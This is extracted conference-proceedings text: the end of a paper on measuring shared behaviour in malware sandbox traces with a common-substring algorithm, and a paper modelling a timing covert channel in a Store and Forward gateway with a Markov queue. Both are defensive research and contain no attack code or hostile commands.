The dynamic traces of the malware instances in the dataset are logs of the events that occurred as the<br />

result of the execution of the malware binary. The logs contain details about each event that may be<br />

of different levels of interest to an analyst, or to analysis software. MIST encodes events in a format<br />

that prioritizes log details, e.g., filenames, sleep delay times, and memory addresses associated<br />

with each event trace. In total there are 120 system calls that fall into 13 more general categories<br />

(e.g., winsock_op, file_open system calls are both in the winsock category). An extensive description<br />

and examples of MIST are presented in (Trinius et al., 2010).<br />
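As a loose illustration of this prioritization (the pipe-delimited field layout below is invented for the sketch; real MIST records use the compact encoding described in Trinius et al., 2010), reducing a trace to MIST level 1 amounts to keeping only the leading category/operation field of each event and discarding the parameter blocks:

```python
# Hypothetical textual stand-ins for MIST records; real MIST uses a compact
# hex encoding, so these pipe-delimited strings are illustrative only.
def to_level1(event: str) -> str:
    """Keep only the leading category/operation field (MIST level 1),
    dropping lower-priority parameter blocks such as filenames or delays."""
    return event.split("|")[0].strip()

trace = [
    "02 02 | kernel32.dll | 0x7c800000",    # a load-library style event
    "03 05 | C:\\temp\\sample.exe | read",  # a file-access style event
]
level1 = [to_level1(e) for e in trace]
print(level1)  # ['02 02', '03 05']
```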

4. The common substrings algorithm<br />

The algorithm developed to identify shared behaviors in malware instance event traces is a modified<br />

version of the well-known longest common substring algorithm (Cormen et al., 2001). The main<br />

difference is that in the modified version, all common substrings of a minimum length are identified,<br />

instead of only the longest.<br />

There are two main procedures that are executed to find the amount of shared behavior in the<br />

malware instances. Figure 1 is the reduction procedure that calculates the amount of common<br />

behavior in the event traces. In line 2, all common substrings are stored in the commonSubstrings<br />

variable. In order to efficiently process the files, this step was first run on instances that were labeled<br />

in the same malware class, i.e., all event traces within the ALLAPLE malware instances (as assigned<br />

by anti-virus software) were compared first, then all EJIK traces, etc.<br />

In lines 3-4, the commonSubstrings are sorted in descending order and output to a file. This allows<br />

the commonsSubstrings to be used to find commonality with other datasets. In lines 5-9, the<br />

occurrences of all strings in commonSubstrings of at least size min are identified in the largeFileSet.<br />

They are then counted and removed. Removing the occurrences in the largeFileSet allows calculating<br />

the amount of common behavior that exists in these malware instances (line 10).<br />
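The reduction procedure can be sketched as follows. This is an independent illustration under assumed data shapes (traces as lists of event identifiers), not the code behind Figure 1:

```python
def reduction(large_traces, common_subs, min_len):
    """Remove every occurrence of each common substring of at least
    min_len events from the large-set traces and return the fraction
    of events accounted for (the 'amount of common behavior')."""
    # Longer substrings first, so long behaviors are not fragmented by
    # the removal of their own shorter sub-sequences.
    ordered = sorted((s for s in common_subs if len(s) >= min_len),
                     key=len, reverse=True)
    total = sum(len(t) for t in large_traces)
    removed = 0
    for trace in large_traces:
        t = list(trace)  # work on a copy; count events removed from it
        for sub in ordered:
            i = 0
            while i + len(sub) <= len(t):
                if tuple(t[i:i + len(sub)]) == sub:
                    del t[i:i + len(sub)]
                    removed += len(sub)
                else:
                    i += 1
    return removed / total if total else 0.0
```

Raising `min_len` reproduces the minimum-length sweep reported in Section 6: fewer substrings qualify, so less of the large set is accounted for.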

Figure 1: The reduction procedure<br />


The CommonSubstring procedure (Figure 2) starts by reading the event traces from two input files<br />

(lines 1-5). In the case that the next event sequences match in the two files, a temporary string,<br />

currSubstring, keeps track of the matching sequences (lines 12-24). When the event sequence is<br />

dissimilar in the two files, the current common substring, currSubstring, is stored if it is unique (lines 8-10)<br />

and finally cleared (line 11). For this research, a hash table was used to ensure that only unique instances<br />

are stored. Lastly, all common substrings found are returned to the calling procedure in line 25.<br />

Figure 2: The CommonSubstring procedure<br />

In practice, because the malware instances share a high amount of common behaviors, the storage<br />

space required to save the unique common substrings is small (less than 50 MB using substrings<br />

greater than or equal to 2).<br />
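The modified substring search itself can be sketched as below; this is an illustrative reimplementation (a naive quadratic scan rather than the authors' code behind Figure 2), with traces again as lists of event identifiers:

```python
def common_substrings(trace_a, trace_b, min_len=2):
    """Return every unique common substring (as a tuple of events) of
    length >= min_len shared by two event traces, not just the longest."""
    found = set()  # the set plays the role of the paper's hash table
    for i in range(len(trace_a)):
        for j in range(len(trace_b)):
            # Grow a run of matching events starting at (i, j); record
            # each extension once it reaches the minimum length.
            k = 0
            while (i + k < len(trace_a) and j + k < len(trace_b)
                   and trace_a[i + k] == trace_b[j + k]):
                k += 1
                if k >= min_len:
                    found.add(tuple(trace_a[i:i + k]))
    return found

# Example: two toy traces sharing the runs a-b-c and e-f-g.
subs = common_substrings(list("abcdefg"), list("xabcyefg"), min_len=3)
```

A suffix-tree or suffix-automaton formulation would find the same substrings in near-linear time; the quadratic scan above is kept only for clarity.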

5. Experimental setup<br />

In order to determine whether common behavior exists in the malware instances, the Reference<br />

dataset was separated into two sets: small and large. The small set contained 2071 instances of<br />

malware that are less than 100 KB in size. The large set contained 1060 instances of malware that<br />

were between 100 KB and 3.4 MB in size. For this research, only the malware size, not the type as<br />


assigned by an anti-virus scanner, was used when separating the dataset. For the most part, the<br />

malware types for small and large sets are different. Table 1 shows more details on the dataset and<br />

how it was partitioned.<br />

Table 1: Details on small and large sets<br />

                                    Small Set    Large Set
  Total # event trace files         2,071        1,060
  Total # events                    1,217,985    17,400,262
  Total size of event trace files   44 MB        490 MB

The smaller dataset was used for capturing the set of common substrings in the hopes that large<br />

complex malware instances may be broken down into behaviors that exist in small malware. For<br />

example, it may be the case that part of a malware instance exhibits the behavior of a trojan to collect<br />

data and may also self-replicate like a worm virus.<br />

The level of detail needed when finding common behavior among malware instances was based on<br />

Rieck et al.’s (2010) work. In their experiment, they found that the best configuration for clustering<br />

malware instances was realized when using MIST level 1. This means that only the event names, not<br />

any other details such as parameters, from the traces were used when searching for common<br />

behaviors. Although their method compared fixed-size event q-grams, the methods in this experiment<br />

are similar; therefore, MIST level 1 was used here as well.<br />

The Reduction algorithm presented in Figure 1 was first run on the small set. In order to more<br />

efficiently process the data, the input was split into four equal size chunks and was processed<br />

concurrently on four computers. After the common substrings from the small set were captured, the<br />

next step was to determine the common behavior that occurs in the large file set.<br />

6. Results<br />

The results show that there is much common behavior among the malware instances. From an<br />

analyst’s point of view, the preferred case is that longer substrings are prevalent among the malware<br />

because these longer substrings most likely capture more semantically rich behavior blocks. If the<br />

substrings are all too short, the effect would be less interesting because it would take almost the same<br />

amount of effort to analyze event traces.<br />

In order to help investigate what is actually happening in the data, the experiment was run several<br />

times using different allowable minimum lengths to identify common substrings. For example, if the<br />

allowed minimum length is six event sequences, all common substrings less than size six are ignored<br />

and are not removed from the large set. Therefore, the reduction percentage, in this example, would<br />

only be based on substrings size six and greater. Figure 3 shows the results for minimum lengths<br />

ranging from 2 to 100.<br />

The graph shows that when only considering substrings of length at least 12, half of the large dataset<br />

can be accounted for using the common substrings in the small set. This indicates that by starting on<br />

small traces, an analyst can break down a large complex trace by removing common behaviors.<br />

When using a minimum length of 24, it seems the restriction is too great; only 30% is accounted for in<br />

the large set, but this also signifies that the dataset represents a reasonable distribution of dissimilar<br />

malware. If the malware all showed high level of similar behavior with many long sequences, it may<br />

be the case that the collected malware is not a good representation of different types of malware. For<br />

example, when looking at some of the longest common substrings found within the small set, it was<br />

sometimes the case that two malware differed only by a few events. Further investigation revealed<br />

that these two malware instances were of the same type and differed only slightly, probably to confuse a<br />

hash-based virus scanner.<br />

When using a minimum size of two, 96% of the large dataset is accounted for, but this is not practical<br />

because most of the shared sequences are short. This is evident because the percentage of shared<br />

behavior drops as the sequence minimum increases.<br />


Figure 3: Average percentage of the large set that is accounted for by common substrings of the<br />

small set<br />

7. Conclusions and future work<br />

This paper has provided a technique that can be used for similarity analysis on malware, based on<br />

dynamic behavior that was captured using CWSandbox. The results show that the similarities are not<br />

restricted to small sequences; many large sequences are shared among the malware instances,<br />

which means that there are in fact many shared behaviors present that could be identified and possibly<br />

labeled using natural language to reduce an analyst’s workload, matching the intentions of Kirillov et<br />

al. (2010).<br />

Future work will test the methods described in this paper with a larger dataset. In addition, instead of<br />

limiting the process to sequential instructions, it may be useful to instead identify templates of<br />

behavior, as Christodorescu et al. (2005) did for static malware analysis. For example, there may be a<br />

trace that contains a sequence of five wait events and another with ten. Semantically, these are<br />

almost equivalent, but the common substring algorithm presented here does not capture this; a<br />

template method could. Tailoring to malware some techniques used in identifying code clones, such<br />

as in (Roy and Cody, 2007) may also prove useful.<br />

The work described here is an initial step for a tool that can be used to semantically label portions of<br />

files to allow for more efficient identification of both redundancy (use of legitimate third-party libraries)<br />

and overlap (reuse of malware code) in malware instances.<br />

Acknowledgments<br />

I would like to thank Victor Mena, Ken Fabela, and Michael Shaughnessy for their valuable comments<br />

and suggestions that led to the maturation of this work. Also, I would like to thank Konrad Rieck and<br />

colleagues for the dataset and feedback.<br />

References<br />

Baecher, P., Koetter, M., Holz, T., Dornseif, M. and Freiling, F. (2006) “The Nepenthes platform: An efficient<br />

approach to collect malware”, Recent Advances in Intrusion Detection, No. 4219, pp 165–184.<br />

Bayer, U., Comparetti, P.M., Hlauschek, C., Kruegel, C. and Kirda, E. (2009) “Scalable, behavior-based malware<br />

clustering”, Network and Distributed System Security Symposium (NDSS).<br />

Bayer, U., Moser, A., Krügel, C. and Kirda, E. (2006) “Dynamic analysis of malicious code”, Journal in Computer<br />

Virology, Vol. 2, No. 1, pp 67–77.<br />

Christodorescu, M., Jha, S., Seshia, S. A., Song, D. and Bryant, R.E. (2005) “Semantics-Aware Malware<br />

Detection”, IEEE Symposium on Security and Privacy, pp 32–46.<br />


Cormen, T.H., Leiserson, C.E., Rivest, R.L. and Stein, C. (2001) Introduction to Algorithms, The MIT Press.<br />

Cornelissen, B. (2009) “Evaluating Dynamic Analysis Techniques for Program Comprehension”, Delft University<br />

of Technology.<br />

Göbel, J. G. (2009) “Amun: Python honeypot”, http://amunhoney.sourceforge.net.<br />

Han, S., Lee, K. and Lee, S. (2010) “Packed PE File Detection for Malware Forensics”, Second International<br />

<strong>Conference</strong> on Computer Science and its Applications (CSA), pp 1–7.<br />

Jang, J. and Brumley, D. (2009) “BitShred: Fast, Scalable Code Reuse Detection in Binary Code”, CMU-CyLab,<br />

pp 28–37.<br />

Kasina, A., Suthar, A. and Kumar, R. (2010) “Detection of Polymorphic Viruses in Windows Executables”,<br />

Contemporary Computing, pp 120–130.<br />

Kirillov, I., Beck, D., Chase, P., and Martin, R. (2010) “Malware Attribute Enumeration and Characterization”,<br />

http://maec.mitre.org/.<br />

Lee, J., Jeong, K., and Lee, H. (2010) “Detecting metamorphic malwares using code graphs”, ACM Symposium<br />

on Applied Computing, pp 1970–1977.<br />

Norman Solutions (2003), “Norman sandbox whitepaper”<br />

http://download.norman.no/whitepapers/whitepaper_Norman_SandBox.pdf<br />

Provos, N. (2004) “A virtual honeypot framework”, USENIX Security Symposium, Vol. 13, p. 1.<br />

Rieck, K., Trinius, P., Willems, C. and Holz, T. (2010) “Automatic Analysis of Malware Behavior using Machine<br />

Learning”, Journal of Computer Security (JCS), to appear.<br />

Roy, C.K. and Cordy, J.R. (2007) “A survey on software clone detection research”, Queen’s School of Computing<br />

TR, Vol. 541, p. 115.<br />

Sharif, M., Lanzi, A., Giffin, J. and Lee, W. (2009) “Automatic reverse engineering of malware emulators”, IEEE<br />

Symposium on Security and Privacy, pp 94–109.<br />

Trinius, P., Willems, C., Holz, T. and Rieck, K. (2010) “A Malware Instruction Set for Behavior-based Analysis”,<br />

Sicherheit 2010, pp 205–216.<br />

Vinod, P., Jaipur, R., Laxmi, V. and Gaur, M.S. (2009) “Survey on malware detection methods”, Hack, p. 74.<br />

Willems, C., Holz, T., Freiling, F. (2007) “Toward automated dynamic malware analysis using CWSandbox”, IEEE<br />

Security and Privacy, Vol. 5, No. 2, pp 32–39.<br />

Ye, Y., Wang, D., Li, T., Ye, D. and Jiang, Q. (2007) “An intelligent PE-malware detection system based on<br />

association mining”, Journal in Computer Virology, Vol. 4, No. 4, pp 323–334.<br />



Modeling and Justification of the Store and Forward<br />

Protocol: Covert Channel Analysis<br />

Hind Al Falasi and Liren Zhang<br />

United Arab Emirates University, Al Ain, United Arab Emirates<br />

hindalfalasi@uaeu.ac.ae<br />

lzhang@uaeu.ac.ae<br />

Abstract: In an environment where two networks with different security levels are allowed to communicate, a<br />

covert channel is created. The paper aims at calculating the probability of establishing a covert channel between<br />

the high security network and the low security network using a Markov chain model. The communication between<br />

the networks follows the Bell-LaPadula (BLP) security model. The BLP model is a “No read up, No write down”<br />

model where up indicates an entity with a high security level and down indicates an entity with a low security<br />

level. In networking, the only way to enforce the BLP model is to divide a network into separate entities, networks<br />

with a low security level, and others with a high security level. This paper discusses our analysis of the Store and<br />

Forward Protocol that enforces the BLP security model. The Store and Forward Protocol (SAFP) is a gateway<br />

that forwards all data from a low security network to a high security network, and it sends acknowledgments to<br />

the low security network as if they were sent from the high security network; thereby achieving reliability of the<br />

communication in this secure environment. A timing covert channel can be established between the two networks<br />

by using the times of the acknowledgments to signal a message from the high security network to the low<br />

security network. A high security network may send acknowledgments immediately or with some delay where the<br />

time of the acknowledgments arrival is used to convey the message. The covert channel probability is found to be<br />

equal to the blocking probability of the SAFP buffer when analyzing the problem using a Markov chain model.<br />

Increasing the size of the buffer at the SAFP decreases the covert channel probability. Carefully determining the<br />

size of the buffer of the SAFP ensures minimizing the covert channel probability.<br />

Keywords: covert channel, access model, Markov Chain Model, store and forward protocol<br />

1. Introduction<br />

Covert channels may be introduced to secure networks both intentionally and unintentionally.<br />

Consider a computer system where two networks with different security levels are communicating; the<br />

existence of covert channels can compromise the efforts exerted to prevent access to higher security<br />

level information by a lower security level network. Security procedures should be established to<br />

prevent the lower network from reading the higher network files, and ensure that the higher network<br />

cannot write to the lower network files. We are referring to a multilevel secure setting where different<br />

networks have different security levels. The notion of having rules that state “No read up” and “No<br />

write down” is in accordance with the BLP security model (Bell and LaPadula 1973). The model's<br />

security procedures make it mandatory for information to flow from the low security network to the<br />

high security network only.<br />

In this paper we are interested in one type of covert channel, a timing channel. In timing channels,<br />

information is transmitted by the timings of events (Wray 1991). This channel is established whenever<br />

the higher network is able to hold up the SAFP (Kang and Moskowitz 1995) response time to signal<br />

an input to the lower network. An acknowledgement sent by the SAFP to the lower network without<br />

delay means no message; however, if the acknowledgment is sent with delay, the value of the delay<br />

is interpreted by the lower network as an alphabet symbol. Therefore, a communication channel is established<br />

between the two networks with the output constructed from the different delay time values. The<br />

medium in which the covert channel exists is, in our case, the network environment, i.e., it is a network<br />

covert channel (Cabuk et al., 2009). The channel manages to control the timing of legitimate network<br />

traffic to allow the leaking of confidential data. The purpose of the covert channel analysis is to<br />

calculate the best buffer size for the SAFP to minimize the probability of the covert channel<br />

establishment.<br />

2. Background and motivation<br />

Information flow between two networks with different security levels should not only be governed by<br />

the rules of the BLP security model. An integral part of implementing the BLP security model is<br />

ensuring that any weaknesses of the system implementing the model do not defeat the purpose<br />

behind it. Being able to identify the circumstances that lead to establishing a covert channel between<br />

the two communicating networks is the first step towards eliminating the covert channel. The<br />

importance of identifying the existence of covert channels stems from the fact that they are used to<br />


transfer information secretly, where the ultimate goal of covert channels is to conceal the very<br />

existence of the communication (Zander et al., 2007).<br />

The capacity of the covert channel was analyzed as a function of buffer size and moving average size<br />

by Kang and Moskowitz (Kang and Moskowitz, 1993; 1995). The analysis was performed on a Pump<br />

that used randomized acknowledgments which are also used to control the input rate of a source. In<br />

addition, several protocols were reviewed and implemented (Kang and Moskowitz, 1993), and the<br />

proposed protocols in their work were designed to reduce the bandwidth of covert channels.<br />

3. Store and Forward Protocol (SAFP)<br />

The Store and Forward protocol is a simple protocol used for reliable communication between two<br />

networks. The protocol's effectiveness in minimizing the existence of covert channels is limited.<br />

However, we use it in this paper as a benchmark to calculate the probability of a timing covert channel,<br />

as the advantage of the protocol is its simplicity of analysis.<br />

The idea behind this protocol is simple: There are two networks communicating, one network has a<br />

low security level, and the other has a high security level. There is a gateway between the two<br />

networks. The gateway does the following job: it receives a packet from the low security network,<br />

stores it in a buffer, and then sends an acknowledgment to the low security network indicating the<br />

successful receipt of that packet. The gateway then forwards the packet to the high security network<br />

and waits for an acknowledgment of receipt. If no such acknowledgment is received, the gateway<br />

retransmits the packet to the high security network. Only after the receipt of the acknowledgment<br />

does the gateway delete that packet from its buffer.<br />
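To make the role of the gateway buffer concrete, the following toy discrete-time simulation (an illustration under assumed Bernoulli arrival and acknowledgment processes, not the Markov chain analysis performed in this paper) estimates how often an arriving low-network packet finds the buffer full:

```python
import random

def simulate_blocking(arrival_p, service_p, buffer_size,
                      steps=200_000, seed=1):
    """Fraction of arriving low-network packets that find the SAFP
    buffer full.  Each time step, a packet arrives with probability
    arrival_p, and the high network acknowledges the head packet
    (freeing its buffer slot) with probability service_p."""
    rng = random.Random(seed)
    occupancy = arrivals = blocked = 0
    for _ in range(steps):
        if rng.random() < arrival_p:
            arrivals += 1
            if occupancy >= buffer_size:
                blocked += 1   # packet rejected: the buffer is full
            else:
                occupancy += 1
        if occupancy and rng.random() < service_p:
            occupancy -= 1     # high-network ack frees one slot
    return blocked / arrivals if arrivals else 0.0
```

Consistent with the abstract's conclusion, enlarging the buffer shrinks this blocking fraction, and with it the covert channel probability.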

All traffic from the high security network is ignored except for the acknowledgments. This notion is in<br />

accordance with the BLP security model (Bell and LaPadula, 1973), a “No read up, No write down” model where “up”<br />
indicates an entity with a high security level and “down” indicates an entity with a low security level. The<br />

gateway forwards all data from the low security network to the high security network, and it does not<br />

forward acknowledgments from the high security network to the low security network; however, it<br />

achieves reliability of the communication by sending acknowledgments to the low security network<br />

(Figure 1).<br />

Figure 1: Store and Forward Protocol (SAFP)<br />
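The gateway behaviour just described can be sketched in a few lines of code. This is our own illustrative sketch, not from the paper; `deliver_high` is a hypothetical callback that forwards a packet to the high security network and returns True once it has been acknowledged.<br />

```python
from collections import deque

class SAFPGateway:
    """Sketch of the SAFP gateway: store, ack the low side, forward, retransmit.

    deliver_high is a caller-supplied function (an assumption for this
    illustration) that sends one packet to the high security network and
    returns True if an acknowledgment came back, False on timeout.
    """

    def __init__(self, deliver_high, capacity):
        self.deliver_high = deliver_high
        self.capacity = capacity     # K: maximum packets held in the buffer
        self.buffer = deque()
        self.low_acks = []           # acks sent back to the low security network

    def on_packet_from_low(self, seq):
        if len(self.buffer) >= self.capacity:
            return False             # buffer full: packet lost, no ack sent
        self.buffer.append(seq)      # store the packet
        self.low_acks.append(seq)    # immediately ack the low security network
        return True

    def forward_one(self):
        seq = self.buffer[0]         # keep the packet until the HSN acks it
        while not self.deliver_high(seq):
            pass                     # no ack received: retransmit
        self.buffer.popleft()        # only now delete it from the buffer
```

Note that the acknowledgment to the low security network is sent as soon as the packet is buffered, independently of the high security network; this independence is precisely what breaks down once the buffer fills.<br />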

3.1 The covert channel<br />

The problem with the store and forward protocol is that it permits covert channels to exist between the<br />

high security network and the low security network through the acknowledgments. A timing covert<br />

channel can be established between the two networks by using the time values of the<br />

acknowledgments to signal a message from the high security network to the low security network. A<br />

high security network may send acknowledgments immediately or with some delay where the value of<br />

the delay is used to convey the message.<br />
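As a concrete and purely illustrative sketch of such a channel, the high security network could leak one bit per acknowledgment by choosing between two ack delays, which the receiving side recovers by thresholding; the delay values here are our own assumptions, not values from the paper.<br />

```python
# Illustrative timing covert channel: one bit per acknowledgment.
# The delay values are arbitrary assumptions chosen for clarity.
SHORT, LONG = 0.01, 0.10            # seconds: ack immediately vs. with delay
THRESHOLD = (SHORT + LONG) / 2      # decision boundary for the receiver

def encode(bits):
    """Delays the high security network applies to its acknowledgments."""
    return [LONG if b else SHORT for b in bits]

def decode(observed_delays):
    """Bits the low security network infers from ack timing alone."""
    return [1 if d > THRESHOLD else 0 for d in observed_delays]
```

In the SAFP setting the low security network only sees the SAFP's acks, so the high security network must modulate those delays indirectly, through the buffer, as discussed in Section 4.3.<br />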

3.2 TCP sliding window effect<br />

The SAFP notifies the low security network of the number of bytes it is willing to receive, which then<br />

becomes the low security network send window. On the other side, the high security network notifies<br />

the SAFP of the number of bytes it is willing to receive, which then becomes the SAFP send window.<br />

At first glance, the use of TCP's sliding window appears to reduce the probability of the covert channel<br />

by minimizing the number of acknowledgments. The low security network can send several packets<br />

without waiting for acknowledgments. Similarly, the high security network can acknowledge several<br />



Hind Al Falasi and Liren Zhang<br />

packets at once. Therefore, for every sequence of packets sent, only one piece of useful information<br />

is sent via one acknowledgment. However, the high security network can set the size of the sliding<br />

window to one, which requires that every packet be acknowledged before the next one is sent, putting<br />

us back to square one.<br />

4. The covert channel analysis<br />

4.1 Notations<br />

The following acronyms are used in the paper: LSN stands for Low Security Network, and HSN<br />

stands for High Security Network.<br />

Table 1: Notation used throughout the paper and in the illustration figures<br />
Arrival Rate = λ; Service Rate = µ; Packet Size = Ri; Queuing Delay = q; Transmission Delay = Tx;<br />
Propagation Delay = α; Acknowledgement Rate (Ack/sec) = R<br />
Arrival rate: LSN → SAFP = λ1; SAFP → HSN = λ2<br />
Service rate: SAFP = µ1; HSN = µ2<br />
Transmission delay: LSN → SAFP = T1; SAFP → HSN = T2<br />
Propagation delay: LSN → SAFP = α1; SAFP → HSN = α2<br />
Ack rate: SAFP → LSN = RL; HSN → SAFP = RH<br />
4.2 Assumptions<br />

T1 and T2 of the acknowledgment packets are ignored because the packet size is small. In addition,<br />

the processing (service) time at SAFP is negligible.<br />

4.3 Discussion<br />

In this section, we investigate the time it takes one packet to travel from the low security network to<br />

the high security network. In addition, we investigate the time it takes an acknowledgement of the<br />

packet to reach the SAFP, as well as the time an acknowledgment from the SAFP to the low security<br />
network takes to reach its destination. From the SAFP's point of view, the i-th packet<br />
is received at α1 + T1. Moreover, the i-th packet is deleted from the buffer at α1 + T1 + 2α2 + T2 + 1/µ2,<br />

where α1 represents the propagation delay of the packets sent between the low security network and<br />

the SAFP. Similarly, α2 represents the propagation delay of the packets sent between the SAFP and<br />

the high security network. T1 and T2 represent the transmission delay from the low security network to<br />

the SAFP, and the SAFP and the high security network, respectively. Finally, 1/ µ2 is the service time<br />

at the high security network.<br />

When we take the distance between the SAFP gateway and the high security network into<br />

consideration, the time a packet stays in the SAFP buffer changes. For example, if the distance is<br />

very large, then we can ignore T2 and 1/µ2. Therefore, the i-th packet is deleted from the buffer at α1 +<br />

T1 + 2α2. As a result, the ability of the high security network to control the acknowledgment rate, and<br />
therefore to create a covert channel, diminishes. The service time at the high security network is the<br />

only factor under the control of the high security network. The other elements are controlled by the<br />

physical environment of the network. On the other hand, if the distance between them is small, we<br />

estimate that the i-th packet is deleted from the buffer at α1 + T1 + T2 + 1/µ2.<br />
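Plugging in hypothetical numbers (ours, chosen only for illustration) shows how the two distance regimes change the time the i-th packet spends in the SAFP buffer:<br />

```python
# All values are illustrative assumptions, not measurements from the paper.
alpha1, T1 = 0.005, 0.002   # LSN-SAFP propagation and transmission delays (s)
alpha2, T2 = 0.020, 0.002   # SAFP-HSN propagation and transmission delays (s)
mu2 = 100.0                 # HSN service rate (packets/s), so 1/mu2 = 0.01 s

# General case: packet deleted at alpha1 + T1 + 2*alpha2 + T2 + 1/mu2
general = alpha1 + T1 + 2 * alpha2 + T2 + 1 / mu2
# Large SAFP-HSN distance: T2 and 1/mu2 are negligible
far_hsn = alpha1 + T1 + 2 * alpha2
# Small SAFP-HSN distance: the propagation delay alpha2 is negligible
near_hsn = alpha1 + T1 + T2 + 1 / mu2
```

With these numbers the packet stays in the buffer 0.059 s in the general case, 0.047 s in the far case and 0.019 s in the near case, so the one term the high security network controls, 1/µ2, carries the most relative weight when the networks are close.<br />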

Another element to consider is the high security network service time, which affects the SAFP<br />

queuing time. We are considering this element because it leads to the establishment of a timing<br />

covert channel between the high security network and the low security network. A slow service time<br />

eventually leads to a full buffer at the SAFP. In other words, packets from the low security network are<br />

lost; therefore, no acknowledgments are sent from the SAFP to the low security network. From there,<br />

the high security network can control the SAFP buffer; subsequently, it can control the rate of the<br />

acknowledgments from the SAFP to the low security network. Therefore, it can use the delays to<br />

signal messages to the low security network. The SAFP buffer is modeled using the M/M/1/K model<br />

as it has a finite capacity where the maximum number of packets in the buffer is K. A packet enters<br />

the queue if it finds fewer than K packets in the buffer and is lost otherwise. The probability of a full<br />

buffer = blocking probability = probability of a covert channel. An illustration of the above scenario is<br />

presented in Figure 2.<br />

Figure 2: Communication representation between low security network, SAFP and high security<br />

network<br />

5. Analysis of the system using Markov chain model<br />

Using the state transition diagram (see Figure 3), we found the blocking probability of the SAFP buffer<br />

(PK):<br />

Solving the balance equations in terms of p0:<br />
λ1 p0 = µ2 p1, which gives p1 = (λ1/µ2) p0 (1)<br />
(λ1 + µ2) pk = λ1 p(k−1) + µ2 p(k+1), which gives pk = (λ1/µ2)^k p0 for 0 ≤ k ≤ K (2)<br />
Σ k=0..K pk = 1 (3)<br />


Solving for PK by substituting (2) into the normalization condition (3):<br />
p0 = 1 / Σ k=0..K (λ1/µ2)^k = (1 − λ1/µ2) / (1 − (λ1/µ2)^(K+1)) (4)<br />
PK = (λ1/µ2)^K (1 − λ1/µ2) / (1 − (λ1/µ2)^(K+1)) (5)<br />

*Where PK = PB = Probability an arriving packet is turned away due to full buffer = Probability of a<br />

covert channel.<br />

Figure 3: Markov chain model of the SAFP queue<br />
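The resulting closed form is straightforward to evaluate. The sketch below is our own, computing the blocking probability of an M/M/1/K buffer from the utilization ratio ρ = λ1/µ2 and the buffer size K:<br />

```python
def blocking_probability(rho, K):
    """M/M/1/K blocking probability PK = rho^K (1 - rho) / (1 - rho^(K + 1)).

    rho is the ratio of the LSN arrival rate to the service rate, and K is
    the SAFP buffer capacity in packets.
    """
    if rho == 1.0:
        return 1.0 / (K + 1)   # limiting value of the formula as rho -> 1
    return rho ** K * (1 - rho) / (1 - rho ** (K + 1))

# Arrival rate twice the service rate, as assumed in Section 6:
print(blocking_probability(2.0, 0))    # 1.0: a zero-size buffer blocks everything
print(blocking_probability(2.0, 10))   # ~0.5002: the plateau seen in Figure 4
```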

6. Results<br />

Figure 4 provides an overview of the relationship between the blocking probability and the size of the<br />

SAFP buffer. We are assuming the simplest possible scenario, where the arrival rate is twice as fast<br />

as the service rate. Starting with a buffer of size 0, the blocking probability is 1.<br />

Figure 4: Pk vs. K<br />

This is understandable, as at this point the SAFP is turning away every packet due to lack of storage<br />
space. When the size of the buffer is 2, we calculate a covert channel probability of more<br />

than 50%. While the probability slightly decreases as we increase the size of the buffer, we find that<br />


the value stabilizes at 0.5, where the change in the blocking probability value is negligible. When the<br />

buffer size exceeds 10, one packet will be serviced and one will be blocked no matter what. As long<br />

as the arrival rate is twice the service rate, whenever a packet from the buffer is accepted to be<br />

serviced, room is made for one packet to enter the buffer. This explains the 0.5 blocking probability.<br />

The blocking probability decreases as the buffer size increases because fewer packets are turned<br />

away, due to a full buffer. When a packet enters the SAFP queue, an acknowledgment of receipt is<br />

sent from the SAFP to the low security network, which means there is no delay that can be interpreted as<br />

a message from the high security network. If we desire a blocking probability of 0.5, then we need a<br />

buffer capable of holding at least 10 packets.<br />
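The plateau can also be cross-checked against the Markov model with a short discrete-event simulation of the buffer; this is our own sanity-check sketch, not part of the paper:<br />

```python
import random

def simulate_blocking(lam, mu, K, n_arrivals=200_000, seed=1):
    """Estimate the M/M/1/K blocking probability as the fraction of
    arriving packets that find the SAFP buffer full."""
    rng = random.Random(seed)
    t = 0.0
    departure = float("inf")   # completion time of the packet in service
    n = 0                      # packets currently in the buffer
    blocked = 0
    for _ in range(n_arrivals):
        t += rng.expovariate(lam)                 # next Poisson arrival
        while departure <= t:                     # drain completed services
            n -= 1
            departure = (departure + rng.expovariate(mu)
                         if n > 0 else float("inf"))
        if n >= K:
            blocked += 1                          # full buffer: packet lost
        else:
            n += 1
            if n == 1:                            # server was idle: start service
                departure = t + rng.expovariate(mu)
    return blocked / n_arrivals
```

With lam=2.0, mu=1.0 and K=10 the estimate comes out near 0.50, matching the stabilized value read off Figure 4.<br />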

7. Conclusion<br />

We examined the SAFP protocol, which is used to provide reliability of communication between two<br />

networks with different security levels. We argued that a timing covert channel can exist between the<br />

two networks, given the possibility that malicious users are able to control the acknowledgments<br />

arrival time. We analyzed the timing of the packets flowing between the two networks and the SAFP,<br />

and the probability of the covert channel between the low security and high security network. The<br />

purpose of our covert channel analysis was to calculate the best buffer size for the SAFP to keep the<br />
probability of the covert channel to a minimum, which we found to depend on the arrival rate of LSN<br />
packets and the service rate at the HSN. We have created a mathematical model to calculate the<br />
covert channel probability and to identify the factors that increase or decrease that probability.<br />

One of our future plans includes building a mathematical model for a Data Pump (Kang and<br />

Moskowitz, 1993; 1995).<br />

References<br />

Bell, D. and LaPadula, L. (1973) Secure Computer Systems: Mathematical Foundation. ESD-TR-73- 278, Vol.1,<br />

Mitre Corp.<br />

Bolch, G., Greiner, S., DeMeer, H. and Trivedi, K.S. (2006) Queueing Networks and Markov Chains: Modeling<br />

and Performance Evaluation with Computer Science Applications. Second Edition, Wiley Interscience,<br />

Hoboken, NJ.<br />

Cabuk, S., Brodley, C. and Shields, C. (2009) IP Covert Channel Detection. ACM Transactions on Information<br />
and System Security, Vol. 12, Issue 4 (Apr. 2009).<br />

Kang, M. and Moskowitz, I. (1995) A Data Pump for Communication. NRL Memo Report 5540-95-7771.<br />

Kang, M. and Moskowitz, I. (1993) A Pump for Rapid, Reliable, Secure Communication. Proceedings ACM Conf.<br />

Computer and Comm. Security '93, Fairfax, VA, pp.119-129.<br />

Ogurtsov, N., Orman, H., Schroeppel, R., O’Malley, S., and Spatscheck, O. (1996) Covert Channel Elimination<br />

Protocols. Technical Reports TR96-14. Department of Computer Science, University of Arizona.<br />

Wray, J. C. (1991) An Analysis of Covert Timing Channels. Research in Security and Privacy, pp. 2-7.<br />
Zander, S., Armitage, G. and Branch, P. (2007) Covert Channels and Countermeasures in Computer Network<br />
Protocols. Communications Magazine, IEEE, Vol. 45, pp. 136-142.<br />



The Evolution of Information Assurance (IA) and<br />

